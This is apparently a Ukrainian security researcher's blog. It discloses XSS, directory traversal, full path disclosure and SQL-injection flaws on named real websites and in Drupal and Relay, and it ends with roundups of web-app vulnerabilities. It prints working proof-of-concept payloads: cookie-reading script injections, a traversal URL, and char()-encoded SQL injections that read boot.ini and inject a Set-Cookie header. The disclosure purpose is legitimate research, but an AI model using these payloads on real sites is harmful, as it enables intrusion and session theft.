Websecurity - Веб безпека

21.08.2008

У грудні, 05.12.2007, я знайшов Full path disclosure, Directory Traversal та Cross-Site Scripting уразливості на сайті http://www.palm.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

23.02.2009

Full path disclosure:

http://www.palm.com/cgi-bin/cso_eula.cgi?template=’

Directory Traversal:

http://www.palm.com/cgi-bin/cso_eula.cgi?template=../index.html

Зараз відкрити будь-який файл не можа (відключили дану можливість), але можна перевіряти наявність файлів в системі.

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)

На сайті прибрали частину файлів (при його редизайні), тому дані XSS не працюють. Але самі дірки вірогідно залишилися, тому якщо знайти робочі файли на сервері для параметрів next і template, то ці XSS знову запрацюють.

Дані уразливості досі переважно не виправлені.

Минулого року я вже писав про уразливість на ko.itc.ua. В лютому, 09.02.2009, я зайшов на сайт itc.ua, щоб перевірити, чи немає на ньому подібної уразливості. І я виявив, що на itc.ua є Cross-Site Scripting уразливість аналогічна дірці на ko.itc.ua (в пошуці по сайту). А також на сайтах dpk.com.ua і gameplay.com.ua. Про що найближчим часом сповіщу адміністрацію сайтів.

Про проекти ITC я писав неодноразово, зокрема про уразливості на job.itc.ua, уразливості на itc.ua та уразливість на www.itc.ua.

XSS:

http://itc.ua

• alert(document.cookie)
• цікавий
• html включення

http://dpk.com.ua

• alert(document.cookie)
• цікавий
• html включення

http://gameplay.com.ua

• alert(document.cookie)
• цікавий
• html включення

В даній добірці уразливості в веб додатках:

• Multiple cross-site scripting vulnerabilities in Mailman (деталі)
• SQL injection in Cisco Unified Communications Manager (деталі)
• joomla SQL Injection(com_ricette) (деталі)
• joomla SQL Injection (cat)(com_downloads) (деталі)
• Simple CMS <= 1.0.3 (indexen.php area) Remote SQL Injection Exploit (деталі)
• RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties (деталі)
• Crafty Syntax Xss Vulnerability (деталі)
• lightblog 9.6 local file inclusion vulnerability (деталі)
• joomla SQL Injection(com_profile) (деталі)
• joomla SQL Injection(com_detail) (деталі)

Нещодавно я писав про XSS уразливість в Drupal. Минулого року, 14.03.2008, я знайшов нову Cross-Site Scripting уразливість в Drupal. Про що найближчим часом сповіщу розробників системи.

Дану уразливість я виявив на сайті ko.itc.ua. На якому я знайшов XSS дірку 17.08.2007 (в пошуці по сайту). А потім коли я зайшов на сайт в 2008 році, виявилося, що вони змінили движок, але знову ж таки мають XSS в пошуці по сайту .

XSS:

http://site/search/node/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі Drupal 5.5 та попередні версії (і можливо деякі наступні версії).

P.S.

Як я додатково перевірив на різних сайтах, версії Drupal 5.7, 5.15, 6.8 і 6.9 не вразливі.

20.08.2008

У грудні, 03.12.2007, а також додатково сьогодні, я знайшов Cross-Site Scripting уразливості на проекті http://www.yarmap.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

20.02.2009

XSS:

• alert(document.cookie) (виправили)
• alert(document.cookie) (виправили)
• html включення

Якщо першу уразливість виправили повністью, то в другій виправили лише XSS, але не html включення. До того ж уразливість виправили погано - виправили лише атаку через GET, тому можлива атака через POST.

XSS:

POST запит на сторінці http://www.yarmap.com.ua
"><script>alert(document.cookie)</script>В полі Що шукаємо.

XSS через GET:

• alert(document.cookie)
• цікавий

Учора я писав про XSS уразливість в Drupal. Сьогодні я зробив дослідження сайтів на движку Drupal, щоб виявити інші сайти з даною уразливістю. І я виявив чимало сайтів на старих версіях Drupal, в тому числі тих, що мають цю дірку.

Зокрема сьогодні я виявив наступні сайти з Cross-Site Scripting уразливістю: http://applefritter.com, http://tomorrow.sg і http://systbio.org (які використовують даний движок).

XSS:

POST запит на сторінці http://applefritter.com/user/password, на сторінці http://tomorrow.sg/user/password і на сторінці http://systbio.org/?q=user/password:
<BODY onload="a='alert';b='(document.cookie)';eval(a+b);"В полях: Username та E-mail address.

В даній добірці уразливості в веб додатках:

• Philips VOIP841 Multiple Vulnerabilities (деталі)
• artmedic weblog multiple local file inclusion vulnerabilities (деталі)
• Astrosoft HelpDesk Multiple XSS (деталі)
• JSPWiki Multiple Vulnerabilities (деталі)
• joomla “com_omnirealestate” S@L Injection (деталі)
• Vulnerability in joomla “com_model” (деталі)
• joomla upload php code or picture (com_uhp) (деталі)
• all forums.asp hack (деталі)
• ALL VERSION PHPAUTOVIDEO c99 shell (деталі)
• Pre-auth remote commands execution in SAP MaxDB 7.6.03.07 (деталі)

Ще 12.11.2007 я знайшов Cross-Site Scripting уразливість в Drupal. Про що найближчим часом сповіщу розробників системи.

Дану уразливість я виявив на сайті http://it.ridne.net, який зокрема публікує новини на тему інформаційної безпеки. Як я виявив в 2008 році, коли дішла черга до публікації даної дірки на it.ridne.net, вони вже виправили її (явно шляхом апгрейда движка, навіть не підозрюючи, що на сайті є уразливість).

XSS:

POST запит на сторінці http://site/user/password
<BODY onload="a='alert';b='(document.cookie)';eval(a+b);"В полях: Username та E-mail address.

Уразливі Drupal 4.5.2 та попередні версії (і можливо деякі наступні версії). В останніх версіях уразливість вже виправлена.

30.11.2007

У листопаді, 30.11.2007, я знайшов Cross-Site Scripting уразливості на проекті http://tinyurl.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

18.02.2009

XSS:

• alert(’XSS’)
• alert(document.cookie)

XSS (Mozilla / Firefox / Opera / Chrome):

• alert(’XSS’)
• alert(document.cookie)

Код спрацьовує при кліку на лінці “Proceed to this site”. Це strictly social XSS: в першому випадку це persistent підтип даного типу XSS, а в другому - persistent self-contained підтип.

XSS (IE):

• alert(document.cookie)
• цікавий

Дані уразливості досі не виправлені.

Минулого року я вже писав про уразливості в Relay. Учора, 16.02.2009, я виявив дві нові уразливості в Relay - Directory Traversal та HTTP Response Splitting. Обидві уразливості пов’язані з однією SQL Injection в Relay, про яку я писав торік. Дані дві атаки проводяться через SQL ін’єкцію.

Якщо HTTP Response Splitting через SQL Injection я раніше вже зустрічав, то Directory Traversal через SQL Injection я виявив вперше (саме в Relay). Ідею подібної атаки мені підкинув Alex на прикладі дірки на http://referat.com.ua.

Подібні атаки відрізняються від считування файлів засобами СУБД (як LOAD_FILE в MySQL) в тому, що вони не залежать від прав користувача на роботу з файловою системою. І тому дані атаки можуть застосовуватися для обходу обмеження на роботу з файловою системою в СУБД.

Directory Traversal (через SQL Injection):

http://site/relay/relay.php?relay=getFile&fileid=-1%20union%20select%201,char(98,111,111,116,46,105,110,105),char(99,58),char(47,102,105,108,101,115,116,111,114,101),1,1,1,1,1,1,1,1,1,1

Для отримання файла boot.ini. На інших ОС можна отримати інші файли.

HTTP Response Splitting (через SQL Injection):

http://site/relay/relay.php?relay=getFile&fileid=-1%20union%20select%201,1,1,char(47,102,105,108,101,115,116,111,114,101),char(10,83,101,116,45,67,111,111,107,105,101,58,32,110,97,109,101,61,118,97,108,117,101,59,32,112,97,116,104,61,47,59),1,1,1,1,1,1,1,1,1

Для встановлення кукіса.

Вразлива версія Relay beta 1.0 (та попередні версії). Про уразливості розробникам веб додатка я повідомлю найближчим часом.